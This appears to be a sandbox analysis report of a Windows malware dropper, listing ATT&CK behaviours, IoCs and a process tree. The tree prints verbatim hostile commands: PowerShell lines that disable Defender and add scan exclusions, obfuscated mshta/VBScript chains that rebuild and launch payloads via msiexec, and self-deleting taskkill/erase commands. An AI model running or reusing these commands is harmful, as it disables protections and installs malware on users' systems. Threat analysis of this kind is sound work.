djvu | 64506751e65ec41605c04620d393cdf9338ce76d31d8b0868dbdfce88f086a03

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3459705.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3459705.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Calculator.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Calculator.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Control Panel\International\Geo\Nation	Tue2076b72c2666aa9c.exe

Loads dropped DLL 7 IoCs

pid	Process
688	setup_install.exe
688	setup_install.exe
688	setup_install.exe
688	setup_install.exe
688	setup_install.exe
2000	Tue201d50e7015.tmp
4356	Tue201d50e7015.tmp

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
4844	icacls.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Calculator.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 15 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
50	ipinfo.io
318	ipinfo.io
575	ipinfo.io
1820	api.2ip.ua
1739	api.2ip.ua
428	ipinfo.io
574	ipinfo.io
2983	api.2ip.ua
52	ip-api.com
54	ipinfo.io
228	ipinfo.io
253	ipinfo.io
229	ipinfo.io
319	ipinfo.io
429	ipinfo.io

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
824	3459705.exe
4388	Calculator.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 1184 set thread context of 4152	1184	Tue2082ea84bd.exe	119
PID 2216 set thread context of 4168	2216	Tue207c76c7f37.exe	120
PID 2676 set thread context of 4560	2676	Tue20c79bfdadc.exe	124

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 5 IoCs

pid	pid_target	Process	procid_target
3224	688	WerFault.exe	75
4668	608	WerFault.exe	108
2792	4720	WerFault.exe	164
3620	4804	WerFault.exe	184
5924	2924	WerFault.exe	190

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Tue205724605816e79.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Tue205724605816e79.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Tue205724605816e79.exe

Creates scheduled task(s) 1 TTPs 5 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
5612	schtasks.exe
6440	schtasks.exe
5588	schtasks.exe
6168	schtasks.exe
5132	schtasks.exe

Delays execution with timeout.exe 5 IoCs

evasion

pid	Process
3648	timeout.exe
6632	timeout.exe
7952	timeout.exe
1984	timeout.exe
5864	timeout.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

Command-Line Interface

T1059

pid	Process
7244	ipconfig.exe

Kills process with taskkill 16 IoCs

evasion

pid	Process
4924	taskkill.exe
6884	taskkill.exe
1364	taskkill.exe
5324	taskkill.exe
8436	taskkill.exe
3212	taskkill.exe
8636	taskkill.exe
5544	taskkill.exe
5140	taskkill.exe
7320	taskkill.exe
2284	taskkill.exe
6788	taskkill.exe
4848	taskkill.exe
6540	taskkill.exe
5548	taskkill.exe
5544	taskkill.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Tue2095db5b6bd7.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Tue2095db5b6bd7.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
3380	PING.EXE
10056	PING.EXE

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	31	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3224	WerFault.exe
3224	WerFault.exe
3224	WerFault.exe
3224	WerFault.exe
3224	WerFault.exe
3224	WerFault.exe
3224	WerFault.exe
3224	WerFault.exe
3224	WerFault.exe
3224	WerFault.exe
3224	WerFault.exe
3224	WerFault.exe
3224	WerFault.exe
3224	WerFault.exe
3224	WerFault.exe
3224	WerFault.exe
3224	WerFault.exe
3224	WerFault.exe
3224	WerFault.exe
712	powershell.exe
712	powershell.exe
1764	powershell.exe
1764	powershell.exe
928	Tue2076b72c2666aa9c.exe
928	Tue2076b72c2666aa9c.exe
928	Tue2076b72c2666aa9c.exe
928	Tue2076b72c2666aa9c.exe
928	Tue2076b72c2666aa9c.exe
928	Tue2076b72c2666aa9c.exe
928	Tue2076b72c2666aa9c.exe
928	Tue2076b72c2666aa9c.exe
928	Tue2076b72c2666aa9c.exe
928	Tue2076b72c2666aa9c.exe
928	Tue2076b72c2666aa9c.exe
928	Tue2076b72c2666aa9c.exe
928	Tue2076b72c2666aa9c.exe
928	Tue2076b72c2666aa9c.exe
928	Tue2076b72c2666aa9c.exe
928	Tue2076b72c2666aa9c.exe
928	Tue2076b72c2666aa9c.exe
928	Tue2076b72c2666aa9c.exe
928	Tue2076b72c2666aa9c.exe
928	Tue2076b72c2666aa9c.exe
928	Tue2076b72c2666aa9c.exe
928	Tue2076b72c2666aa9c.exe
928	Tue2076b72c2666aa9c.exe
928	Tue2076b72c2666aa9c.exe
928	Tue2076b72c2666aa9c.exe
928	Tue2076b72c2666aa9c.exe
928	Tue2076b72c2666aa9c.exe
928	Tue2076b72c2666aa9c.exe
928	Tue2076b72c2666aa9c.exe
928	Tue2076b72c2666aa9c.exe
928	Tue2076b72c2666aa9c.exe
928	Tue2076b72c2666aa9c.exe
928	Tue2076b72c2666aa9c.exe
928	Tue2076b72c2666aa9c.exe
928	Tue2076b72c2666aa9c.exe
928	Tue2076b72c2666aa9c.exe
928	Tue2076b72c2666aa9c.exe
928	Tue2076b72c2666aa9c.exe
928	Tue2076b72c2666aa9c.exe
928	Tue2076b72c2666aa9c.exe
928	Tue2076b72c2666aa9c.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
1900	Tue205724605816e79.exe

Suspicious use of AdjustPrivilegeToken 41 IoCs

description	pid	Process
Token: SeRestorePrivilege	3224	WerFault.exe
Token: SeBackupPrivilege	3224	WerFault.exe
Token: SeCreateTokenPrivilege	1192	Tue2095db5b6bd7.exe
Token: SeAssignPrimaryTokenPrivilege	1192	Tue2095db5b6bd7.exe
Token: SeLockMemoryPrivilege	1192	Tue2095db5b6bd7.exe
Token: SeIncreaseQuotaPrivilege	1192	Tue2095db5b6bd7.exe
Token: SeMachineAccountPrivilege	1192	Tue2095db5b6bd7.exe
Token: SeTcbPrivilege	1192	Tue2095db5b6bd7.exe
Token: SeSecurityPrivilege	1192	Tue2095db5b6bd7.exe
Token: SeTakeOwnershipPrivilege	1192	Tue2095db5b6bd7.exe
Token: SeLoadDriverPrivilege	1192	Tue2095db5b6bd7.exe
Token: SeSystemProfilePrivilege	1192	Tue2095db5b6bd7.exe
Token: SeSystemtimePrivilege	1192	Tue2095db5b6bd7.exe
Token: SeProfSingleProcessPrivilege	1192	Tue2095db5b6bd7.exe
Token: SeIncBasePriorityPrivilege	1192	Tue2095db5b6bd7.exe
Token: SeCreatePagefilePrivilege	1192	Tue2095db5b6bd7.exe
Token: SeCreatePermanentPrivilege	1192	Tue2095db5b6bd7.exe
Token: SeBackupPrivilege	1192	Tue2095db5b6bd7.exe
Token: SeRestorePrivilege	1192	Tue2095db5b6bd7.exe
Token: SeShutdownPrivilege	1192	Tue2095db5b6bd7.exe
Token: SeDebugPrivilege	1192	Tue2095db5b6bd7.exe
Token: SeAuditPrivilege	1192	Tue2095db5b6bd7.exe
Token: SeSystemEnvironmentPrivilege	1192	Tue2095db5b6bd7.exe
Token: SeChangeNotifyPrivilege	1192	Tue2095db5b6bd7.exe
Token: SeRemoteShutdownPrivilege	1192	Tue2095db5b6bd7.exe
Token: SeUndockPrivilege	1192	Tue2095db5b6bd7.exe
Token: SeSyncAgentPrivilege	1192	Tue2095db5b6bd7.exe
Token: SeEnableDelegationPrivilege	1192	Tue2095db5b6bd7.exe
Token: SeManageVolumePrivilege	1192	Tue2095db5b6bd7.exe
Token: SeImpersonatePrivilege	1192	Tue2095db5b6bd7.exe
Token: SeCreateGlobalPrivilege	1192	Tue2095db5b6bd7.exe
Token: 31	1192	Tue2095db5b6bd7.exe
Token: 32	1192	Tue2095db5b6bd7.exe
Token: 33	1192	Tue2095db5b6bd7.exe
Token: 34	1192	Tue2095db5b6bd7.exe
Token: 35	1192	Tue2095db5b6bd7.exe
Token: SeDebugPrivilege	3868	Tue20abd30733a17.exe
Token: SeDebugPrivilege	3224	WerFault.exe
Token: SeDebugPrivilege	1764	powershell.exe
Token: SeDebugPrivilege	712	powershell.exe
Token: SeDebugPrivilege	4668	WerFault.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3956 wrote to memory of 1876	3956	a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe	74
PID 3956 wrote to memory of 1876	3956	a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe	74
PID 3956 wrote to memory of 1876	3956	a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe	74
PID 1876 wrote to memory of 688	1876	setup_installer.exe	75
PID 1876 wrote to memory of 688	1876	setup_installer.exe	75
PID 1876 wrote to memory of 688	1876	setup_installer.exe	75
PID 688 wrote to memory of 1720	688	setup_install.exe	78
PID 688 wrote to memory of 1720	688	setup_install.exe	78
PID 688 wrote to memory of 1720	688	setup_install.exe	78
PID 688 wrote to memory of 2084	688	setup_install.exe	79
PID 688 wrote to memory of 2084	688	setup_install.exe	79
PID 688 wrote to memory of 2084	688	setup_install.exe	79
PID 688 wrote to memory of 1376	688	setup_install.exe	80
PID 688 wrote to memory of 1376	688	setup_install.exe	80
PID 688 wrote to memory of 1376	688	setup_install.exe	80
PID 688 wrote to memory of 3104	688	setup_install.exe	84
PID 688 wrote to memory of 3104	688	setup_install.exe	84
PID 688 wrote to memory of 3104	688	setup_install.exe	84
PID 688 wrote to memory of 1616	688	setup_install.exe	81
PID 688 wrote to memory of 1616	688	setup_install.exe	81
PID 688 wrote to memory of 1616	688	setup_install.exe	81
PID 688 wrote to memory of 3304	688	setup_install.exe	82
PID 688 wrote to memory of 3304	688	setup_install.exe	82
PID 688 wrote to memory of 3304	688	setup_install.exe	82
PID 688 wrote to memory of 3600	688	setup_install.exe	83
PID 688 wrote to memory of 3600	688	setup_install.exe	83
PID 688 wrote to memory of 3600	688	setup_install.exe	83
PID 688 wrote to memory of 3768	688	setup_install.exe	85
PID 688 wrote to memory of 3768	688	setup_install.exe	85
PID 688 wrote to memory of 3768	688	setup_install.exe	85
PID 688 wrote to memory of 2316	688	setup_install.exe	86
PID 688 wrote to memory of 2316	688	setup_install.exe	86
PID 688 wrote to memory of 2316	688	setup_install.exe	86
PID 688 wrote to memory of 3136	688	setup_install.exe	87
PID 688 wrote to memory of 3136	688	setup_install.exe	87
PID 688 wrote to memory of 3136	688	setup_install.exe	87
PID 688 wrote to memory of 3032	688	setup_install.exe	89
PID 688 wrote to memory of 3032	688	setup_install.exe	89
PID 688 wrote to memory of 3032	688	setup_install.exe	89
PID 688 wrote to memory of 3420	688	setup_install.exe	88
PID 688 wrote to memory of 3420	688	setup_install.exe	88
PID 688 wrote to memory of 3420	688	setup_install.exe	88
PID 688 wrote to memory of 2864	688	setup_install.exe	90
PID 688 wrote to memory of 2864	688	setup_install.exe	90
PID 688 wrote to memory of 2864	688	setup_install.exe	90
PID 688 wrote to memory of 3044	688	setup_install.exe	92
PID 688 wrote to memory of 3044	688	setup_install.exe	92
PID 688 wrote to memory of 3044	688	setup_install.exe	92
PID 688 wrote to memory of 3556	688	setup_install.exe	91
PID 688 wrote to memory of 3556	688	setup_install.exe	91
PID 688 wrote to memory of 3556	688	setup_install.exe	91
PID 688 wrote to memory of 3788	688	setup_install.exe	93
PID 688 wrote to memory of 3788	688	setup_install.exe	93
PID 688 wrote to memory of 3788	688	setup_install.exe	93
PID 688 wrote to memory of 3968	688	setup_install.exe	94
PID 688 wrote to memory of 3968	688	setup_install.exe	94
PID 688 wrote to memory of 3968	688	setup_install.exe	94
PID 3556 wrote to memory of 1184	3556	cmd.exe	95
PID 3556 wrote to memory of 1184	3556	cmd.exe	95
PID 3556 wrote to memory of 1184	3556	cmd.exe	95
PID 1720 wrote to memory of 1764	1720	cmd.exe	96
PID 1720 wrote to memory of 1764	1720	cmd.exe	96
PID 1720 wrote to memory of 1764	1720	cmd.exe	96
PID 2084 wrote to memory of 712	2084	cmd.exe	97

C:\Users\Admin\AppData\Local\Temp\a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe
"C:\Users\Admin\AppData\Local\Temp\a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3956
- C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1876
- - C:\Users\Admin\AppData\Local\Temp\7zS457A0586\setup_install.exe
    "C:\Users\Admin\AppData\Local\Temp\7zS457A0586\setup_install.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:688
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1720
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1764
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2084
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:712
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue200ab8d408d.exe
      4⤵
      PID:1376
    - - C:\Users\Admin\AppData\Local\Temp\7zS457A0586\Tue200ab8d408d.exe
        
        Tue200ab8d408d.exe
        5⤵
        Executes dropped EXE
        
        PID:1784
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue2082eedf21.exe /mixone
      4⤵
      PID:1616
    - - C:\Users\Admin\AppData\Local\Temp\7zS457A0586\Tue2082eedf21.exe
        
        Tue2082eedf21.exe /mixone
        5⤵
        Executes dropped EXE
        
        PID:1408
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "Tue2082eedf21.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS457A0586\Tue2082eedf21.exe" & exit
        6⤵
        
        PID:3172
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "Tue2082eedf21.exe" /f
        7⤵
        Kills process with taskkill
        
        PID:4848
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue207c76c7f37.exe
      4⤵
      PID:3304
    - - C:\Users\Admin\AppData\Local\Temp\7zS457A0586\Tue207c76c7f37.exe
        
        Tue207c76c7f37.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2216
      - C:\Users\Admin\AppData\Local\Temp\7zS457A0586\Tue207c76c7f37.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS457A0586\Tue207c76c7f37.exe
        6⤵
        Executes dropped EXE
        
        PID:4168
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue20adee3c26d.exe
      4⤵
      PID:3600
    - - C:\Users\Admin\AppData\Local\Temp\7zS457A0586\Tue20adee3c26d.exe
        
        Tue20adee3c26d.exe
        5⤵
        Executes dropped EXE
        
        PID:3872
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vBScRiPt: cLOsE(CREaTeOBject ("WSCRipt.sHEll" ). Run ( "CMd /r tYpE ""C:\Users\Admin\AppData\Local\Temp\7zS457A0586\Tue20adee3c26d.exe"" > ..\_4SO.EXE &&sTARt ..\_4SO.Exe /PZOIMJIYi~u3pALhs & If """"== """" for %Y In ( ""C:\Users\Admin\AppData\Local\Temp\7zS457A0586\Tue20adee3c26d.exe"") do taskkill /IM ""%~nXY"" -f" , 0, tRUE ) )
        6⤵
        
        PID:4104
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /r tYpE "C:\Users\Admin\AppData\Local\Temp\7zS457A0586\Tue20adee3c26d.exe" >..\_4SO.EXE &&sTARt ..\_4SO.Exe /PZOIMJIYi~u3pALhs& If ""== "" for %Y In ( "C:\Users\Admin\AppData\Local\Temp\7zS457A0586\Tue20adee3c26d.exe") do taskkill /IM "%~nXY" -f
        7⤵
        
        PID:5048
        
        C:\Users\Admin\AppData\Local\Temp\_4SO.EXE
        
        ..\_4SO.Exe /PZOIMJIYi~u3pALhs
        8⤵
        Executes dropped EXE
        
        PID:4756
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vBScRiPt: cLOsE(CREaTeOBject ("WSCRipt.sHEll" ). Run ( "CMd /r tYpE ""C:\Users\Admin\AppData\Local\Temp\_4SO.EXE"" > ..\_4SO.EXE &&sTARt ..\_4SO.Exe /PZOIMJIYi~u3pALhs & If ""/PZOIMJIYi~u3pALhs""== """" for %Y In ( ""C:\Users\Admin\AppData\Local\Temp\_4SO.EXE"") do taskkill /IM ""%~nXY"" -f" , 0, tRUE ) )
        9⤵
        
        PID:4580
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /r tYpE "C:\Users\Admin\AppData\Local\Temp\_4SO.EXE" >..\_4SO.EXE &&sTARt ..\_4SO.Exe /PZOIMJIYi~u3pALhs& If "/PZOIMJIYi~u3pALhs"== "" for %Y In ( "C:\Users\Admin\AppData\Local\Temp\_4SO.EXE") do taskkill /IM "%~nXY" -f
        10⤵
        
        PID:436
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vBsCripT: clOsE ( crEatEobJECT( "WSCRIPt.SHELL" ).RUn( "cMD.exE /q /C ecHo | SET /p = ""MZ"" >5~XZ.D & COpy /y /b 5~xz.D + LaXZ3lI.UF+ 53Bv.3un +3B8VN.JpX ..\WOYVBNM.9 & stArt msiexec -y ..\WOYVBnm.9 & dEL /Q * " , 0 ,tRue ) )
        9⤵
        
        PID:3504
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /q /C ecHo | SET /p = "MZ" >5~XZ.D&COpy /y /b 5~xz.D + LaXZ3lI.UF+ 53Bv.3un+3B8VN.JpX ..\WOYVBNM.9 & stArt msiexec -y ..\WOYVBnm.9 & dEL /Q *
        10⤵
        
        PID:3228
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" SET /p = "MZ" 1>5~XZ.D"
        11⤵
        
        PID:6392
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ecHo "
        11⤵
        
        PID:6384
        
        C:\Windows\SysWOW64\msiexec.exe
        
        msiexec -y ..\WOYVBnm.9
        11⤵
        
        PID:6664
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /IM "Tue20adee3c26d.exe" -f
        8⤵
        Kills process with taskkill
        
        PID:4924
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue201d50e7015.exe
      4⤵
      PID:3104
    - - C:\Users\Admin\AppData\Local\Temp\7zS457A0586\Tue201d50e7015.exe
        
        Tue201d50e7015.exe
        5⤵
        Executes dropped EXE
        
        PID:3252
      - C:\Users\Admin\AppData\Local\Temp\is-H7GPJ.tmp\Tue201d50e7015.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-H7GPJ.tmp\Tue201d50e7015.tmp" /SL5="$4005A,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS457A0586\Tue201d50e7015.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2000
        
        C:\Users\Admin\AppData\Local\Temp\7zS457A0586\Tue201d50e7015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS457A0586\Tue201d50e7015.exe" /SILENT
        7⤵
        Executes dropped EXE
        
        PID:4288
        
        C:\Users\Admin\AppData\Local\Temp\is-MSSKI.tmp\Tue201d50e7015.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-MSSKI.tmp\Tue201d50e7015.tmp" /SL5="$601D8,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS457A0586\Tue201d50e7015.exe" /SILENT
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4356
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue20ea834764a6.exe
      4⤵
      PID:3768
    - - C:\Users\Admin\AppData\Local\Temp\7zS457A0586\Tue20ea834764a6.exe
        
        Tue20ea834764a6.exe
        5⤵
        Executes dropped EXE
        
        PID:3172
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue20abd30733a17.exe
      4⤵
      PID:2316
    - - C:\Users\Admin\AppData\Local\Temp\7zS457A0586\Tue20abd30733a17.exe
        
        Tue20abd30733a17.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3868
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue2076b72c2666aa9c.exe
      4⤵
      PID:3136
    - - C:\Users\Admin\AppData\Local\Temp\7zS457A0586\Tue2076b72c2666aa9c.exe
        
        Tue2076b72c2666aa9c.exe
        5⤵
        Executes dropped EXE
        Checks computer location settings
        Suspicious behavior: EnumeratesProcesses
        
        PID:928
      - C:\Users\Admin\Pictures\Adobe Films\at3KFaQxFRp5my5SFUeapNOl.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\at3KFaQxFRp5my5SFUeapNOl.exe"
        6⤵
        Executes dropped EXE
        
        PID:4940
      - C:\Users\Admin\Pictures\Adobe Films\ANGBgbtFu9kiH7FrGVODG5Pw.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\ANGBgbtFu9kiH7FrGVODG5Pw.exe"
        6⤵
        
        PID:5160
        
        C:\Users\Admin\Documents\2atOFonneNJmkAvBdHdBUKxg.exe
        
        "C:\Users\Admin\Documents\2atOFonneNJmkAvBdHdBUKxg.exe"
        7⤵
        
        PID:5284
        
        C:\Users\Admin\Pictures\Adobe Films\rOYHocLPnV9yDhv_JPuoW6Yx.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\rOYHocLPnV9yDhv_JPuoW6Yx.exe"
        8⤵
        
        PID:6528
        
        C:\Users\Admin\Pictures\Adobe Films\gvS2L77V4UAXXOhgHcxgvn0d.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\gvS2L77V4UAXXOhgHcxgvn0d.exe"
        8⤵
        
        PID:6924
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "gvS2L77V4UAXXOhgHcxgvn0d.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\gvS2L77V4UAXXOhgHcxgvn0d.exe" & exit
        9⤵
        
        PID:5748
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "gvS2L77V4UAXXOhgHcxgvn0d.exe" /f
        10⤵
        Kills process with taskkill
        
        PID:7320
        
        C:\Users\Admin\Pictures\Adobe Films\6dK_MfUBcpayi9j9YEVgwLOZ.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\6dK_MfUBcpayi9j9YEVgwLOZ.exe"
        8⤵
        
        PID:5896
        
        C:\Windows\SysWOW64\mshta.exe
        
